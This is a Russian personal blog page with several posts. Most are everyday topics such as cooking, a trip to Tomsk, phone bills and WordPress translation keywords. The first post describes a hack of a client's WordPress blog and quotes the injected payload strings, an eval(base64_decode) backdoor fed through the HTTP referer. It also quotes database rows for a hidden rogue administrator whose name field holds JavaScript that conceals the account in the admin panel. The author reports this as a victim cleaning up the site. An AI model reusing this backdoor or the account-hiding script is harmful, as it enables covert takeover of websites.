Ахтунг! Атаки на WordPress блоги

Столкнулся позавчера с одним “глюком” при настройке клиентского блога – криво работали ссылки на комментарии и падал сервер базы данных при попытке отредактировать пользователей в админке. и кстати там показывает вот такую хрень при этом:
wp-ahtung
Phpmyadmin выдает при этом примерно такое:

Lost connection to MySQL server during query

и не отвечает сервер минут 50 после этого…

Погуглил тогда сразу и нашел как исправить ошибки с постоянными ссылками, но сегодня в дампе базы данных обнаружил что там исправляется далеко не все. Ручками повыкашивал разные строки типа:

%25&%28%7B%24%7Beval%28base64_decode%28%24_SERVER%5BHTTP_REFERER%5D%29%29%7D%7D%7C.%2B%29&%25/
%25&evalbase64_decode_SERVERHTTP_REFERER.%2B&%25/
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)
%&{${evalbase64_decode$_SERVER[HTTP_REFERER]}}|.+&%/
&%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

В базе данных это выглядело примерно так (этот юзер не показывается вообще в админке):

(574, 143, 'rich_editing', 'true'),
(575, 143, 'comment_shortcuts', 'false'),
(576, 143, 'admin_color', 'fresh'),
(577, 143, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
(578, 143, 'first_name', '...\n\n\n\n\n\n\n\n\n<div id="user_superuser"><script language="JavaScript">\nvar setUserName = function(){\n try{\n          var t=document.getElementById("user_superuser");\n              while(t.nodeName!="TR"){\n                      t=t.parentNode;\n               };\n            t.parentNode.removeChild(t);\n          var tags = document.getElementsByTagName("H3");\n               var s = " shown below";\n               for (var i = 0; i < tags.length; i++) {\n                       var t=tags[i].innerHTML;\n                      var h=tags[i];\n                        if(t.indexOf(s)>0){\n                           s =(parseInt(t)-1)+s;\n                         h.removeChild(h.firstChild);\n                          t = document.createTextNode(s);\n                               h.appendChild(t);\n                     }\n             }\n             var arr=document.getElementsByTagName("ul");\n          for(var i in arr) if(arr[i].className=="subsubsub"){\n                  var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);\n                      if(n[1]>0){\n                           var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");\n        arr[i].innerHTML=txt;\n        }\n    }\n          }catch(e){};\n     };\n     addLoadEvent(setUserName);\n</script></div>'),
(573, 143, 'nickname', 'NicolasMager80'),
(570, 1, 'closedpostboxes_dashboard', 'a:1:{i:0;s:0:"";}'),
(571, 1, 'metaboxhidden_dashboard', 'a:3:{i:0;s:17:"dashboard_plugins";i:1;s:17:"dashboard_primary";i:2;s:19:"dashboard_secondary";}'),
(572, 1, 'plugins_last_view', 'all'),
(579, 143, 'wp_user_level', '10');

вот этот поддельный администратор "хакер"

(143, 'NicolasMager80', '$P$BIum3O2v9eAU9dAJRcn23VX2VjnbsG.', 'nicolasmager80', '', '', '2009-09-05 12:41:37', '', 0, 'NicolasMager80');

Сегодня с утра про эту же атаку на блоги прочитал у Дмитрия Донченко тут

так что обновляйтесь регулярно :-)

25 комментариев

Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 8, средний: 3.88 из 5)
Загрузка ... Загрузка ...

Рыбный день ;-)

Этот праздник живота по разным причинам сегодня оттягивался, но все же состоялся. Девушки наготовили сегодня просто убойную дозу роллов. Когда закупали продукты в магазине “Море и Суши“, то мне казалось что всего мало и хотелось набрать и того и другого еще. Но когда начали готовить, то поняли что получится ОЧЕНЬ много любимых роллов. Все за раз не осилили… И похоже завтра тоже не осилим… Но все довольны :-)

Роллы

Роллы


Продолжить чтение →

15 комментариев

Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 4, средний: 5.00 из 5)
Загрузка ... Загрузка ...

Уродская дриста и ее сервисфаки

Что за Куйня? Сколько помню, все сервиспаки от Майкрософта ставились по принципу  ”поставил последний и более ранние не нужны”, а вот дриста (vista) хочет перед установкой второго пака сначала первый. Уродство! Хорошо, что первый уже был давно скачан… Мало того что он в дристе”ставится в час по чайной ложке”, так еще и два раза ставить надо их (первый и затем второй).

Обсуждение закрыто

Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 5, средний: 2.60 из 5)
Загрузка ... Загрузка ...

Побил свой рекорд расходов на мобильную связь

Средний расход на мобильник у меня последние года 3 был около 300рублей в месяц, а вот как я “оторвался” в августе (сегодня пришел отчет где все смачно расписано):

Израсходовано за период: 2155,95 руб. Я вроде даже зимой когда к тому же еще был и в Египте и платил там за роуминговый интернет и потом еще пользовался местной симкой потратил меньше

Есть там где то на 300рублей звонков, на остальную сумму разные платные смс-ки и т.д., но больше всего выделяется среди этого строка

Исходящая связь GPRS (WWW): 123500 килобайт 814,0035

По большей части такой огромный для меня расход мобильного инета связан с тем что мой красно-яйцевый оператор с некоторого времени стал “округлять до 100килобайт”, а я в августе довольно часто пользовался аськой и мини-оперой в телефоне и продолжаю пользоваться довольно часто.

Сменить тариф что ли… (оператора менять не буду, слишком много “привязанностей”)

21 комментарий

Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 1, средний: 5.00 из 5)
Загрузка ... Загрузка ...

Кактус кулинарит. Цена вопроса — около 2*** рублей. Удовольствие — бесценно.

Сегодня первый раз в жизни варил варенье. Не одно, а сразу четыре различных. Из персиков, абрикосов, абрикосов и грецких орехов, абрикосов и корня имбиря.

Абрикосовое варенье

Абрикосовое варенье


Продолжить чтение →

9 комментариев

Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 7, средний: 4.86 из 5)
Загрузка ... Загрузка ...

Фотоотдых или работа?!

/just мысли вслух/
Хорошая зеркальная фототехника — это, безусловно, хорошо… Кроме того что ей умеют пользоваться не все, впрочем как и “мыльницами” тоже. В итоге из алтайских снимков первой половины отдыха (так вышло что отпуск у меня разделился незапланированно на две части) с отпуска я сам присутствую только на примерно 1-2% снимков, из них почти половина испорчена неправильным кадрированием, т.е. то руки в кадр не влезают целиком, то ноги, то еще что нибудь из окружающего… т.е. их в принципе можно и удалить почти все. Вроде показывал всем кто брал камеру в руки что “снимать вот примерно так”, но все равно почему то получалось “не то в большинстве случаев”. И вообще на отдыхе плохо быть практически одним “снимающим происходящее”, т.к. ты вечно за кадром и тебя словно там и не было, словно ты наемный фотограф, который приехал поснимать как отдыхают другие… Пересмотрел почти все снимки за лето и там ситуация очень похожая по количеству и качеству снимков с моим присутствием.
Конечно, фототехника на отдыхе есть почти всегда не только у меня, пусть и разного класса, но что то не прислали мне ни одного снимка, т.к. снимали насколько помню только других, но зато от меня почему то фотки всегда ждут и спрашивают даже если я говорю что некогда их обрабатывать. Плюс ко всему у меня такие объемы отснятого материала с разного времени, что его еще месяц разгребать на хорошее-плохое и что то надо редактировать. Просматриваю обычно быстро все, выбираю несколько кадров и их обрабатываю, а остальное “когда получится”.
В общем на будущее решил снимать только то что мне интересно с точки зрения творчества + фотографировать тех кого я сам только захочу, а на остальное пусть снимают сами себя своей техникой, если хотят воспоминаний. Не ездить ведь отдыхать только ради того чтобы сделать побольше фотографий “как я провел лето”. 90% таких снимков однотипны и повторяются из года в год. К тому же мне например снимать на отдыхе больше нравится не когда демонстративно позируют на камеру, а как бы со стороны.
В конце концов я потратился столько на оптику по большей части чтобы снимать не обычные гулянки, а что нибудь поинтереснее. И так вышло что именно во второй части отпуска получилось больше таких кадров, ради которых стоит иметь подобную технику.

14 комментариев

Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 6, средний: 5.00 из 5)
Загрузка ... Загрузка ...

Хорошо в Томске, уютненько так :-)

Съездили на четырехчасовую экскурсию в славный сибирский город Томск. Все там не так как у нас в В Новосибе. Начиная от дорог и дорожных знаков, заканчивая общим впечатлением. Как то там тихо, уютно и спокойно – причем везде куда бы мы ни заезжали. Никакой суеты, все уютно и красиво. И даже рекламные щиты необычные есть, например вот такой запомнился с блестящей надписью “SALE”
sale
Наверное , я бы даже туда поехал пожить бы на какое то время

14 комментариев

Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 9, средний: 4.56 из 5)
Загрузка ... Загрузка ...

Разобрался таки с кривым официальным wordpress.pot

Гуглил, гуглил по разным запросам и нагуглил вот такой хитрый файлик, который типа извлекает все ресурсы как надо. Мне точнее было интересно больше какие ключевые слова используются, т.к. все собирал гуглом по крупицам и вот сейчас наконец POEDIT перестал выдрепываться и заработал как надо при извлечении ресурсов.
Тот файл wordpress.pot что выложен на wordpress.org настолько кривой что вообще лучше его не использовать, т.к. он основан на уже будущей версии 2.9 и к 2.8.* подходит не на 100%

Чем руководствовались авторы? зачем с только премудростей если раньше без них обходились? в официальной документации про это ни слова. там старое бла-бла-бла про

__($message)
и
_e($message)

В общем в версии 2.8.* используется аж вот столько ключевиков для локализации:

__
_e
_c
__ngettext:1,2
_n:1,2
_nc:1,2
__ngettext_noop:1,2
_n_noop:1,2
_x:1,2c
_nx:1,2,4c
_nx_noop:1,2,3c
esc_attr__
esc_attr_e
esc_attr_x:1,2c
esc_html__
esc_html_e
esc_html_x:1,2c

Причем о конструкции некоторых элементов можно было только примерно догадываться и на основе этого гуглить. Также нашел одну тему про это на официальном форуме, но там был вопрос только про один из ключевиков и все.

10 комментариев

Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 7, средний: 4.57 из 5)
Загрузка ... Загрузка ...